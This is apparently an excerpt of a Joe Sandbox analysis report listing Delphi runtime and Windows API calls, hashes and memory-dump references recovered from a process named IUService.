                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50027676), ref: 500275C8
                                                                                                                                            • @System@UniqueString$qqrr20System@UnicodeString.RTL120(00000000,50027676), ref: 500275D0
                                                                                                                                              • Part of subcall function 5000AAF8: @System@@NewUnicodeString$qqri.RTL120(?,5000A544), ref: 5000AAC6
                                                                                                                                              • Part of subcall function 5000AAF8: @System@Move$qqrpxvpvi.RTL120(00000000,?,5000A544), ref: 5000AAD7
                                                                                                                                              • Part of subcall function 5000AAF8: @System@@FreeMem$qqrpv.RTL120(?,5000A544), ref: 5000AAEC
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50027676), ref: 500275DC
                                                                                                                                            • GetFileVersionInfoSizeW.VERSION(00000000,?,00000000,50027676), ref: 500275E2
                                                                                                                                            • @System@@GetMem$qqri.RTL120(00000000,?,00000000,50027676), ref: 500275EF
                                                                                                                                              • Part of subcall function 50003FB0: @System@SysGetMem$qqri.RTL120 ref: 50003FB4
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,?,00000000,50027659,?,00000000,?,00000000,50027676), ref: 50027611
                                                                                                                                            • GetFileVersionInfoW.VERSION(00000000,?,00000000,?,00000000,50027659,?,00000000,?,00000000,50027676), ref: 50027617
                                                                                                                                            • VerQueryValueW.VERSION(?,50027688,?,?,00000000,?,00000000,?,00000000,50027659,?,00000000,?,00000000,50027676), ref: 50027631
                                                                                                                                            • @System@@FreeMem$qqrpv.RTL120(50027660,?,00000000,50027659,?,00000000,?,00000000,50027676), ref: 50027653
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@$Unicode$String$Char$qqrx20FileFreeInfoMem$qqriMem$qqrpvVersion$Asg$qqrr20Move$qqrpxvpviQuerySizeString$qqriString$qqrr20Stringx20UniqueValue
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3340374955-0
                                                                                                                                            • Opcode ID: dddfb272de7c6e7c87dd35fe2d24d2a7e29585c5b1d1b6a14b8fcc4ff7acbc84
                                                                                                                                            • Instruction ID: 20c290cfac2a6ec53872fbffc8a20628a873dcac3785a9ff7ef993043faeba55
                                                                                                                                            • Opcode Fuzzy Hash: dddfb272de7c6e7c87dd35fe2d24d2a7e29585c5b1d1b6a14b8fcc4ff7acbc84
                                                                                                                                            • Instruction Fuzzy Hash: 69215871A0568AAFDB01DFE9ED51C6EB7FCEF49200B914672B504E3251D734AE04C690
                                                                                                                                            APIs
                                                                                                                                            • @System@@WStrClr$qqrpv.RTL120(00000000,50034AEC,?,?,?,00000000,00000000,00000000,00000000,?,50035965,?,?,?,?), ref: 50034A53
                                                                                                                                              • Part of subcall function 50009588: SysFreeString.OLEAUT32(?), ref: 50009596
                                                                                                                                            • @Variants@VarResultCheck$qqrlusus.RTL120(?,?,?,00000000,00000000,00000000,00000000,?,50035965,?,?,?,?), ref: 50034A72
                                                                                                                                            • @System@@UStrFromWStr$qqrr20System@UnicodeStringx17System@WideString.RTL120(?,?,?,00000000,00000000,00000000,00000000,?,50035965,?,?,?,?), ref: 50034A8F
                                                                                                                                            • @Sysutils@LowerCase$qqrx20System@UnicodeString.RTL120(?,?,?,00000000,00000000,00000000,00000000,?,50035965,?,?,?,?), ref: 50034A9A
                                                                                                                                            • @System@@WStrFromUStr$qqrr17System@WideStringx20System@UnicodeString.RTL120(?,?,?,00000000,00000000,00000000,00000000,?,50035965,?,?,?,?), ref: 50034AA4
                                                                                                                                            • @System@@UStrFromWStr$qqrr20System@UnicodeStringx17System@WideString.RTL120(?,?,?,00000000,00000000,00000000,00000000,?,50035965,?,?,?,?), ref: 50034AB0
                                                                                                                                            • @Sysutils@UpperCase$qqrx20System@UnicodeString.RTL120(?,?,?,00000000,00000000,00000000,00000000,?,50035965,?,?,?,?), ref: 50034ABB
                                                                                                                                            • @System@@WStrFromUStr$qqrr17System@WideStringx20System@UnicodeString.RTL120(?,?,?,00000000,00000000,00000000,00000000,?,50035965,?,?,?,?), ref: 50034AC5
                                                                                                                                            • @Variants@VarInvalidOp$qqrv.RTL120(?,?,?,00000000,00000000,00000000,00000000,?,50035965,?,?,?,?), ref: 50034ACC
                                                                                                                                              • Part of subcall function 500307FC: @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,50030846,?,00000000), ref: 50030817
                                                                                                                                              • Part of subcall function 500307FC: @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,50030846,?,00000000), ref: 50030826
                                                                                                                                              • Part of subcall function 500307FC: @System@@RaiseExcept$qqrv.RTL120(00000000,50030846,?,00000000), ref: 5003082B
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$String$Unicode$System@@$FromWide$Sysutils@$Case$qqrx20Str$qqrr17Str$qqrr20Stringx17Stringx20Variants@$Check$qqrlususClr$qqrpvExcept$qqrvException@$bctr$qqrx20FreeInvalidLoadLowerOp$qqrvRaiseResultString$qqrp20Upper
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1787277866-0
                                                                                                                                            • Opcode ID: 1fcb6342362c8eb2675f5850fad802939ed4ea52e9e2d599269feaa4d86d904b
                                                                                                                                            • Instruction ID: 28ee5e0d826e7c4dbe94008d08a8dd18efc8e78135a813a0b291ff3b53295a70
                                                                                                                                            • Opcode Fuzzy Hash: 1fcb6342362c8eb2675f5850fad802939ed4ea52e9e2d599269feaa4d86d904b
                                                                                                                                            • Instruction Fuzzy Hash: FC11E270640585AFEF01EBA4DCA2DEEB3A8EF45200F908776B900EB651D6B0BD0587D6
                                                                                                                                            APIs
                                                                                                                                            • @System@TObject@ClassName$qqrv.RTL120(00000000,50006B69), ref: 50006B08
                                                                                                                                              • Part of subcall function 50006AC4: @System@UTF8ToString$qqrrx28System@%SmallString$iuc$255%.RTL120 ref: 50006AD1
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50006B69), ref: 50006B10
                                                                                                                                              • Part of subcall function 500089A4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(50006B15,00000000,50006B69), ref: 500089B7
                                                                                                                                            • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50006B69), ref: 50006B15
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,00000000,50006B69), ref: 50006B1E
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,00000000,00000000,50006B69), ref: 50006B27
                                                                                                                                            • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,00000000,00000000,50006B69), ref: 50006B2C
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,00000000,00000000,00000000,50006B69), ref: 50006B35
                                                                                                                                            • CompareStringW.KERNEL32(?,00000001,00000000,00000000,00000000,00000000,00000000,50006B69), ref: 50006B43
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$String$System@@$Char$qqrx20EnsureLen$qqrx20String$qqrr20System@%$AnsiClassCompareFromInternalName$qqrvObject@SmallStr$qqrr20String$iuc$255%String$qqrrx28Stringx27T$us$i0$%
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2698194505-0
                                                                                                                                            • Opcode ID: 7a18ea293cba9f4f732223db10a86afe3026c92dbc0af962d2106ebeff8d67eb
                                                                                                                                            • Instruction ID: 07edf7bba6b7798c112338542bf63ced82e12cf919ecdcd04dcacc31e71116a0
                                                                                                                                            • Opcode Fuzzy Hash: 7a18ea293cba9f4f732223db10a86afe3026c92dbc0af962d2106ebeff8d67eb
                                                                                                                                            • Instruction Fuzzy Hash: 9D017174505288AFEB10EBE4EC6299EB7BCEF59310F904677B404E3652DB30AA009696
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@LastDelimiter$qqrx20System@UnicodeStringt1.RTL120(00000000,5001C580), ref: 5001C503
                                                                                                                                              • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C430
                                                                                                                                              • Part of subcall function 5001C3F4: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C442
                                                                                                                                              • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C466
                                                                                                                                              • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C48D
                                                                                                                                              • Part of subcall function 5001C3F4: @Sysutils@StrScan$qqrpxbb.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C49C
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C580), ref: 5001C52A
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001C580), ref: 5001C550
                                                                                                                                            • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(?,00000000,5001C580), ref: 5001C55D
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$System@@$String$AnsiFromInternalStr$qqrr20Stringx27System@%T$us$i0$%$Sysutils@$Cat3$qqrr20Char$qqrx20Copy$qqrx20Delimiter$qqrx20LastScan$qqrpxbbStringiiStringt1Stringt2Stringx20
                                                                                                                                            • String ID: .\:
                                                                                                                                            • API String ID: 2717076658-496007442
                                                                                                                                            • Opcode ID: a89fb4eec0d62e8afcb9bcc628ec571381857e07fc04220a90b3bcf355591fdb
                                                                                                                                            • Instruction ID: d01c72174dcf2e075b5b8dd55ecc10e744eed8894acf6479d7133b6cc06a8146
                                                                                                                                            • Opcode Fuzzy Hash: a89fb4eec0d62e8afcb9bcc628ec571381857e07fc04220a90b3bcf355591fdb
                                                                                                                                            • Instruction Fuzzy Hash: 9B119330A00688EBDB04DFE9D89199DB3F9EF49310BA083B6E41093251EB70EF81DA40
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrFromWArray$qqrr20System@UnicodeStringpbi.RTL120(00000000,B",?,?,?,00000000), ref: 50005949
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,B",?,?,?,00000000), ref: 50005952
                                                                                                                                            • MoveFileW.KERNEL32(00000000), ref: 50005958
                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000,B",?,?,?,00000000), ref: 5000597D
                                                                                                                                            • @System@SetInOutRes$qqri.RTL120(00000000,?,00000000,B",?,?,?,00000000), ref: 50005982
                                                                                                                                            • @System@SetInOutRes$qqri.RTL120(00000000,B",?,?,?,00000000), ref: 5000598E
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Res$qqriSystem@@Unicode$Array$qqrr20Char$qqrx20ErrorFileFromLastMoveStringStringpbi
                                                                                                                                            • String ID: B"
                                                                                                                                            • API String ID: 3244090159-4078893311
                                                                                                                                            • Opcode ID: 4a2eb7b6fd8b58eeb8d6c45eddf589e6c8aac0e0df426a6a7fc9b1bc2b78b412
                                                                                                                                            • Instruction ID: df590b721be1972d76404118b1dd1283823992a997f97f748f899e6b97df8a74
                                                                                                                                            • Opcode Fuzzy Hash: 4a2eb7b6fd8b58eeb8d6c45eddf589e6c8aac0e0df426a6a7fc9b1bc2b78b412
                                                                                                                                            • Instruction Fuzzy Hash: 3601F5302056C5DAFB20EBA4D9B16AF72ECDF59222FD00A76F640D2112E6659E0081A5
                                                                                                                                            APIs
                                                                                                                                            • FindResourceW.KERNEL32(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010640
                                                                                                                                            • @Sysutils@RaiseLastOSError$qqrv.RTL120(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 5001064B
                                                                                                                                              • Part of subcall function 5002A908: GetLastError.KERNEL32(50010679,00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 5002A908
                                                                                                                                              • Part of subcall function 5002A908: @Sysutils@RaiseLastOSError$qqri.RTL120(50010679,00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 5002A90D
                                                                                                                                            • LoadResource.KERNEL32(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010657
                                                                                                                                            • @Sysutils@RaiseLastOSError$qqrv.RTL120(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010662
                                                                                                                                            • LockResource.KERNEL32(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010668
                                                                                                                                            • @Sysutils@RaiseLastOSError$qqrv.RTL120(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010674
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Last$RaiseSysutils@$Error$qqrvResource$ErrorError$qqriFindLoadLock
                                                                                                                                            • String ID: CHARTABLE$PkP
                                                                                                                                            • API String ID: 2693630376-1680022972
                                                                                                                                            • Opcode ID: 1eb605201eaa7e6766b98b1e00adbd3eb7b47462771e20d424d66e1f26d623af
                                                                                                                                            • Instruction ID: cc429218ece2e4869d3c0890a31dc3911705f99bbb730b9440c9ee6bded52d1b
                                                                                                                                            • Opcode Fuzzy Hash: 1eb605201eaa7e6766b98b1e00adbd3eb7b47462771e20d424d66e1f26d623af
                                                                                                                                            • Instruction Fuzzy Hash: 9D0144B47517818FE71CDF94EDA099577F5BB98310B09862DE182D7761CB78D880CB60
                                                                                                                                            APIs
                                                                                                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,500085EF,?,?,?,?,?,?,500086BE,500041BB,50004202), ref: 5000855D
                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,500085EF,?,?,?,?,?,?,500086BE,500041BB), ref: 50008563
                                                                                                                                            • GetStdHandle.KERNEL32(000000F5,500085B0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,500085EF), ref: 50008578
                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F5,500085B0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,500085EF), ref: 5000857E
                                                                                                                                            • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 5000859C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileHandleWrite$Message
                                                                                                                                            • String ID: 0CP$Error$Runtime error at 00000000
                                                                                                                                            • API String ID: 1570097196-3976705077
                                                                                                                                            • Opcode ID: c7f65587848cdab12b096d8458637050e43fc9a3475b859aec640a5b1c1ffc15
                                                                                                                                            • Instruction ID: 13760cef71b14ba24bdf52ca3db3f2b841d9a020471f696476a3b083ba67eecc
                                                                                                                                            • Opcode Fuzzy Hash: c7f65587848cdab12b096d8458637050e43fc9a3475b859aec640a5b1c1ffc15
                                                                                                                                            • Instruction Fuzzy Hash: 14F0F652901AC0BAFA1093D06C62FC535989BA0A29FD8470AF650690D2E77445C49722
                                                                                                                                            APIs
                                                                                                                                            • @System@@DynArrayLength$qqrv.RTL120(5001B7D4), ref: 5001B59D
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5001B5CA
                                                                                                                                            • @System@@DynArraySetLength$qqrv.RTL120(00000001,5001B7D4), ref: 5001B5B8
                                                                                                                                              • Part of subcall function 5000C0F4: @System@DynArraySetLength$qqrrpvpvipi.RTL120 ref: 5000C0F9
                                                                                                                                            • @System@@DynArrayLength$qqrv.RTL120(5001B7D4), ref: 5001B5D4
                                                                                                                                            • @System@@DynArraySetLength$qqrv.RTL120(00000001,5001B7D4), ref: 5001B5EF
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5001B601
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$ArraySystem@$Length$qqrvUnicode$Asg$qqrr20StringStringx20$Length$qqrrpvpvipi
                                                                                                                                            • String ID: False$True
                                                                                                                                            • API String ID: 1602069110-1895882422
                                                                                                                                            • Opcode ID: dc1f99dea7fc06d24d915c1314f15eaf0c255ee8a481010edc47a443f1a80566
                                                                                                                                            • Instruction ID: a813428639982090d4a362bd633a8cf1e7a719357de9231205594663fbfa07b6
                                                                                                                                            • Opcode Fuzzy Hash: dc1f99dea7fc06d24d915c1314f15eaf0c255ee8a481010edc47a443f1a80566
                                                                                                                                            • Instruction Fuzzy Hash: FBF01C7170118197F714A7E4FC52B6A33A2EBA0714F404239FA448F6A6DB6AFC818BC1
                                                                                                                                            APIs
                                                                                                                                            • @System@TMonitor@TryEnter$qqrv.RTL120 ref: 5000731C
                                                                                                                                              • Part of subcall function 500076F4: GetCurrentThreadId.KERNEL32 ref: 500076F7
                                                                                                                                            • GetTickCount.KERNEL32 ref: 50007343
                                                                                                                                            • GetTickCount.KERNEL32 ref: 50007355
                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 50007388
                                                                                                                                            • GetTickCount.KERNEL32 ref: 500073AC
                                                                                                                                            • GetTickCount.KERNEL32 ref: 500073E6
                                                                                                                                            • @System@TMonitor@GetEvent$qqrv.RTL120 ref: 500073F1
                                                                                                                                            • GetTickCount.KERNEL32 ref: 50007410
                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 50007486
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CountTick$CurrentThread$Monitor@System@$Enter$qqrvEvent$qqrv
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1987720909-0
                                                                                                                                            • Opcode ID: 20729751b9ca491032756733baeeb24b399c546541366898f273070eb1456356
                                                                                                                                            • Instruction ID: cdbcf1bc501056cecbbc3dd38a171081e16c6904e9569bf655de2ffa8f35bad7
                                                                                                                                            • Opcode Fuzzy Hash: 20729751b9ca491032756733baeeb24b399c546541366898f273070eb1456356
                                                                                                                                            • Instruction Fuzzy Hash: 0741C830A097C15AF311EE7CD6A93AEBFD15F94240F948B1ED9DC87282DB79C8408352
                                                                                                                                            APIs
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(?,?,00000000,855390C3,-00000008,5000B39F,?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?), ref: 5000B1A3
                                                                                                                                            • @System@@LStrAsg$qqrpvpxv.RTL120(?,?,00000000,855390C3,-00000008,5000B39F,?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?), ref: 5000B1F5
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,00000000,855390C3,-00000008,5000B39F,?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?), ref: 5000B209
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(?,00000000,855390C3,-00000008,5000B39F,?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?), ref: 5000B2A9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Move$qqrpxvpviSystem@@Unicode$Asg$qqrpvpxvAsg$qqrr20StringStringx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3030236992-0
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000A6C6), ref: 5000A5E7
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000A6C6), ref: 5000A614
                                                                                                                                            • @System@@IntOver$qqrv.RTL120(?,00000000,5000A6C6), ref: 5000A651
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(?,00000000,5000A6C6), ref: 5000A65B
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(?,00000000,5000A6C6), ref: 5000A67E
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(?,00000000,5000A6C6), ref: 5000A695
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(?,00000000,5000A6C6), ref: 5000A6AB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@$Unicode$AnsiFromMove$qqrpxvpviStr$qqrr20StringStringx27System@%T$us$i0$%$Internal$Length$qqrr20Over$qqrvStringi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1011950963-0
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001137A), ref: 500112A6
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001137A), ref: 500112C3
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001137A), ref: 500112FB
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,5001137A), ref: 5001132C
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,5001137A), ref: 50011331
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001137A), ref: 5001134E
                                                                                                                                            • @Character@TCharacter@IsSurrogate$qqrb.RTL120(00000000,5001137A), ref: 50011358
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$StringSystem@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Character@$Asg$qqrr20Except$qqrvException@$bctr$qqrp20RaiseRecpx14RecxiStringx20Surrogate$qqrbSysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2718466752-0
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50010A42), ref: 5001096E
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010A42), ref: 5001098B
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010A42), ref: 500109C3
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,50010A42), ref: 500109F4
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,50010A42), ref: 500109F9
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010A42), ref: 50010A16
                                                                                                                                            • @Character@TCharacter@IsHighSurrogate$qqrb.RTL120(00000000,50010A42), ref: 50010A20
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$StringSystem@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Character@$Asg$qqrr20Except$qqrvException@$bctr$qqrp20HighRaiseRecpx14RecxiStringx20Surrogate$qqrbSysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4039923113-0
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@IntToStr$qqri.RTL120(00000000,50016C32,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016B7D
                                                                                                                                              • Part of subcall function 5001B1C8: @System@@UStrFromPCharLen$qqrr20System@UnicodeStringpci.RTL120 ref: 5001B1DB
                                                                                                                                            • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,50016C32,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016B89
                                                                                                                                              • Part of subcall function 5000A1E4: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000A202
                                                                                                                                            • @Sysutils@IntToStr$qqri.RTL120(00000000,50016C32,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016BAE
                                                                                                                                            • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,50016C32,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016BBA
                                                                                                                                              • Part of subcall function 5000A1E4: @System@@NewUnicodeString$qqri.RTL120 ref: 5000A227
                                                                                                                                              • Part of subcall function 5000A1E4: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000), ref: 5000A23B
                                                                                                                                              • Part of subcall function 5000A1E4: @System@Move$qqrpxvpvi.RTL120(00000000), ref: 5000A253
                                                                                                                                              • Part of subcall function 5000A1E4: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000), ref: 5000A263
                                                                                                                                              • Part of subcall function 5000A1E4: @System@Move$qqrpxvpvi.RTL120(00000000), ref: 5000A279
